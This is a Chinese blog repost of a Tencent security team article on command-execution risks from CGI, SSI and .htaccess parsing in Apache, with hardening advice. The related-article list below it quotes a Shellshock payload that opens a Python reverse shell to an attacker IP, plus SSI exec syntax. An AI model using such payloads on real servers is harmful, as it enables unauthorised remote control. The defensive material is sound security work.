运维安全之Apache(CGI&SSI&.htaccess)安全隐患

最新推荐文章于 2024-01-08 08:57:49 发布
转载 最新推荐文章于 2024-01-08 08:57:49 发布 · 1k 阅读 · 0
本文由腾讯安全应急响应中心人员通过实验探讨Apache开启解析CGI/SSI/.htaccess的危害。默认配置下,解析不当可能导致系统命令执行。攻击者可通过上传文件利用解析漏洞执行命令。文章还给出安全建议,如非必需编译时禁用,必需时配置可写目录等。

Apache默认配置支持解析CGI (Common Gateway Interface) (仅cgi-bin目录),不解析SSI(Server Side Includes)和.htaccess。当配置不当时,可能导致系统命令执行。本文由腾讯安全应急响应中心的Mark4z5同学通过实验来探讨开启解析CGI/SSI/.htaccess的危害以及安全建议。

一、安装实验环境

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

 

二、解析CGI (Common Gateway Interface)

 

http://httpd.apache.org/docs/current/howto/cgi.html

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

先看httpd.conf相关默认配置

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

可以看到默认/cgi-bin/目录可解析CGI,但是当打开网页时,并没有执行输出,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

原因是程序默认并没有赋予X执行权限,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

当赋予X执行权限后,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

可以执行CGI,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

那么当攻击者可以往/cgi-bin/目录写文件,或者服务器管理员配置某个可写目录解析CGI时,就会造成严重危害,执行系统命令。如

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

执行系统命令id并输出,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

 

三、解析SSI (Server Side Includes)

 

http://httpd.apache.org/docs/current/howto/ssi.html

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

先看httpd.conf相关默认配置

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患运维安全之Apache(CGI&SSI&.htaccess)安全隐患

 

默认并不解析SSI,开启解析可配置如下,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患运维安全之Apache(CGI&SSI&.htaccess)安全隐患

当攻击者上传.shtml文件时,可以执行任意系统命令。如

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

执行id并输出,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

四、解析.htaccess

 

http://httpd.apache.org/docs/current/howto/htaccess.html

 

先看httpd.conf相关默认配置

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

默认并不解析.htaccess,当配置解析时

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患

攻击者只要可以上传.htaccess文件和其他恶意文件,就可以让apache解析CGI/SSI来执行系统命令。如下,

 

运维安全之Apache(CGI&SSI&.htaccess)安全隐患运维安全之Apache(CGI&SSI&.htaccess)安全隐患

五、安全建议

       1、如果CGI&SSI非必需,则编译apache时禁用掉,参数为(--disable-cgi --disable-cgid --disable-include)

       2、如果CGI&SSI为必需,则在httpd.conf配置可写目录禁止AllowOverride,且Options为FollowSymLinks。

<Directory "/usr/local/apache2/htdocs/YourPath">

      Options FollowSymLinks

      AllowOverride None

</Directory>

注:Options可以按需设置,但绝不能设置成ExecCGI或Includes;AllowOverride None是禁止解析.htaccess。

 

 

【最后】

       已配置php安全模式的Apache并不完全能防止webshell执行系统命令,因为Apache本身支持CGI和SSI执行系统命令。

原味连接:blog.sina.com.cn/s/blog_e092fd2f0102v6oa.html

[CTF].htaccess的使用技巧总结
热门推荐
Y4tacker的博客
05-11 1万+
文章目录前言.htaccess什么是htaccess文件简介其他实用指令自定义出错界面SetHandler和ForceTypeAddHandlerAddTypephp_valuephp_flagTrick总结利用404页面文件包含本地文件包含远程文件包含可以利用伪协议htaccess自己解析自己目录下有php文件无php文件文件解析配合一句话木马Cgi执行FastCgi执行利用报错信息写马绕过exif_imagetype()上传.htaccess\号绕过waf\号绕过藏字符参考文章 前言 这周参加了津门杯,
Apache .htaccess文件
unber的博客
01-08 1242
htaccess文件提供了一种基于每个目录进行配置更改的方法。
Apache 服务器的安全设置
Beret-81的博客
04-15 2182
Apache 服务器的安全设置Apache 简单介绍Apache 服务器的安全设置账号设置授权设置日志设置隐藏Apache 版本信息修改Apache默认首页禁止目录浏览限制目录执行权限删除缺省安装的无用文件自定义错误页面关闭 TRACE 功能禁用 CGI限制IP访问限制请求消息长度修改默认端口 Apache 简单介绍 Apache HTTP Server(简称Apache)是Apache软件基金...
cgi-bin是什么
jackin2的专栏
04-21 7022
CGI-BIN是一种特殊的目录,在进行交互式的WWW访问(如填写在线表格)时,需要服务器上有相应的程序对访问者输入的信息进行处理,这些程序就是CGI程序。CGI程序不能放在任意的目录下,只能放在CGI-BIN目录下。有的虚拟主机系统只提供一个公用的CGI-BIN目录,放置一些常用的CGI程序供虚拟主机用户使用,这对用户不够方便,因为用户经常需要放置自己编制的CGI程序。我安装一个apache,ap
Apache服务安全加固
03-25 567
一、账号设置 以专门的用户帐号和用户组运行 Apache 服务。 根据需要,为 Apache 服务创建用户及用户组。如果没有设置用户和组,则新建用户,并在 Apache 配置文件中进行指定。 创建 Apache 用户组。 groupadd apache 创建 Apache 用户并加入 Apache 用户组。 useradd apache –g apac...
apache 支持cgi 的问题快被搞疯了
木子三水的专栏
11-04 1856
by:c1      apache安装查看:http://blog.csdn.net/sanshuei/article/details/8146249   1. 配置/etc/httpd/httpd.conf LoadModule cgi_module modules/mod_cgi.so       # 去掉该行前面#号,确认配置中已添加cgi模块,并apache2/module
apache配置cgi出错_apache配置cgi脚本
weixin_31733409的博客
01-14 458
首先要了解apache配置文件httpd.conf。打开此文件,有一行DocumentRoot "F:/xampp/htdocs"表示http根目录为F:/xampp/htdocs配置Apache以允许CGI要让CGI程序能正常运作,必须配置Apache以允许CGI的执行,其方法有多种。1.ScriptAliasScriptAlias /cgi-bin/ /usr/local/apache2/cg...
配置apache运行cgi程序
ChineseTaipei
09-20 759
配置apache运行cgi程序可分为两种情况,一是ScriptAlias目录的CGI,二是ScriptAlias以外目录的CGI。 ScriptAlias目录的CGI ScriptAlias指令使Apache允许执行一个特定目录中的CGI程序。当客户端请求此特定目录中的资源时,Apache假定其中文件都是CGI程序并试图运行。 ScriptAlias指令形如: ScriptAlia
Linux apache2 cgi教程
lyjtynet的专栏
04-07 3020
今天想要做个PHP扩展插件来实现网页截图,这个我一年前就在想到现在才开始作,在网上找了很多资料,最后发现自己需要用CGI所以就开始配置自己的CGI首先安装apache的时候就已经默认安装了CGI只需要少许的改动,就可以用了AddHandler cgi-script .cgi去掉前面的#号该文件在httpd.conf或者是mime.conf这该文件ScriptAliasScriptA
linux登录系统被拒绝访问权限,linux – (13)权限被拒绝:访问/cgi-bin/test.cgi被拒绝...
weixin_32137855的博客
04-29 966
我第一次尝试CGI脚本,但没有成功.我已经阅读了很多教程,并且可能会在不同的论坛上发帖,但是我无法使其工作.我在Fedora 10机器上使用appache web服务器.我总是有问题[Wed Oct 21 20:47:36 2009] [notice] SELinux policy enabled; httpd running as context unconfined_u:system_r:ht...
CGI漏洞攻击手册
蓝法典的专栏
03-20 1万+
在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.:). phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/e
文件上传漏洞之.htaccess文件解析漏洞
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
06-01 8658
  htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
文件上传漏洞
huangyongkang666的博客
03-21 1330
文件上传漏洞 1.什么是文件上传漏洞 ​ 文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。 2.漏洞产生原因 ​ 由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型, 导致攻击者能够向某个可通过 Web 访问 的目录上传恶意文件,并被脚本解析器执行,这样就可以在远程服务器上执行恶意脚本 。 3.文件上传漏洞危害 ​
后缀名检测与绕过之.htaccess文件攻击
m0_73720136的博客
05-06 1791
掌握文件上传的服务端检测中的后缀名检测原理,类似于php、asp、jsp等脚本文件得后缀不允许上传,通过上传.htaccess文件,利用.htaccess文件攻击,将内容符合PHP语法规则的文件当作PHP脚本来解析,从而实现解析上传的脚本文件。
Apache服务优化
******* ▄︻┻┳═一 *******
04-09 910
一、账号设置 以专门的用户帐号和用户组运行 Apache 服务。 1、根据需要,为 Apache 服务创建用户及用户组。如果没有设置用户和组,则新建用户,并在 Apache 配置文件中进行指定。 创建 Apache 用户组。 groupadd webuser 创建 Apache 用户并加入 Apache 用户组。 useradd webuser –g webuser 将下面两行设...
XML 外部实体注入漏洞
qq_40201047的博客
11-14 5291
0x01 XXE(XML外部实体注入)漏洞 1.1 漏洞原因 1.2 漏洞构造方式 1.3 XML可解析的协议 0x02 寻找XXE漏洞隐藏的攻击面 2.1 XInclude攻击 2.2 通过文件上传进行XXE攻击 2.3 通过修改Content-Type头进行XXE攻击 0x03 如何查找和测试XXE漏洞 0x01 XXE(XML外部实体注入)漏洞 1.1 漏洞原因 XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发...
渗透测试网络攻防-apache cgi漏洞利用
网络安全领域优质创作者
11-05 3328
cgi-bin扫描路径暴露出:/cgi-bin/ wget-qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0);...
Apache SSI 远程命令执行漏洞复现
Z_l123的博客
03-01 390
漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。 漏洞范围 2.4.0~2.4.29 漏洞复现 1.访问地址 2.
浅析Apache中SSI和CGI的设定方法
tandyong的专栏
05-23 685
由于Apache具有相当高的可移植性,它支持超过30种操作系统,包括Unix、Windows 及Darwin等系统,所以目前在网络上已注册的网域里大部份是使用Apache网页服务器。目前ApacheSoftware Foundation 正致力于发展现在已进入alpha测试阶段的Apache2.0。在这里,我和大家探讨如何修改服务器选项让服务器能提供简单的动态网页内容,也就是支持 CGI程序及 S
CGI漏洞速查二
|独自望海。。。
09-28 2694
 php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任 何系统文件可以被入侵者读取的漏洞 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。解决方法: 删除php.cgi程序是最好的办法。 12.handler 描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存 溢出错误,允许入侵者在server上远程执行一段程序
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值